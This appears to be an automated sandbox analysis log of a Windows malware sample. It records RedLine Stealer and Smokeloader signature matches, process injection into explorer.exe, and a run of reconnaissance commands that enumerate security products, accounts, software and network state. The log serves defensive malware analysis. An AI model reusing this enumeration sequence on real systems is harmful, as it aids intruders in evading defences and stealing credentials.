      Source: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@62/14@5/4
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_005BF894 CreateToolhelp32Snapshot,Module32First,0_2_005BF894
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A7138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,10_2_00007FF7327A7138
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\derhsweJump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1D0F.tmpJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
      Source: bCnarg2O62.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;324&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;408&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;484&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;492&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;552&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;620&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;628&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;776&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;784&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;872&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;920&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;988&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;364&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;356&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;696&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;592&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1044&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1084&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1176&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1200&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1252&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1296&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1316&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1408&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1476&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1488&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1496&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1552&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1572&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1652&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1724&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1824&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1840&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1940&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1948&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1956&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2036&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1932&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2064&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2152&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2216&quot;::GetOwner
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: D805.tmp.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: bCnarg2O62.exeReversingLabs: Detection: 39%
      Source: unknownProcess created: C:\Users\user\Desktop\bCnarg2O62.exe "C:\Users\user\Desktop\bCnarg2O62.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\derhswe C:\Users\user\AppData\Roaming\derhswe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\derhswe C:\Users\user\AppData\Roaming\derhswe
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1D0F.exe C:\Users\user\AppData\Local\Temp\1D0F.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jfrhswe C:\Users\user\AppData\Roaming\jfrhswe
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9245.exe C:\Users\user\AppData\Local\Temp\9245.exe
      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
      Source: C:\Users\user\AppData\Local\Temp\9245.exeProcess created: C:\Windows\System32\cmd.exe cmd
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1D0F.exe C:\Users\user\AppData\Local\Temp\1D0F.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9245.exe C:\Users\user\AppData\Local\Temp\9245.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
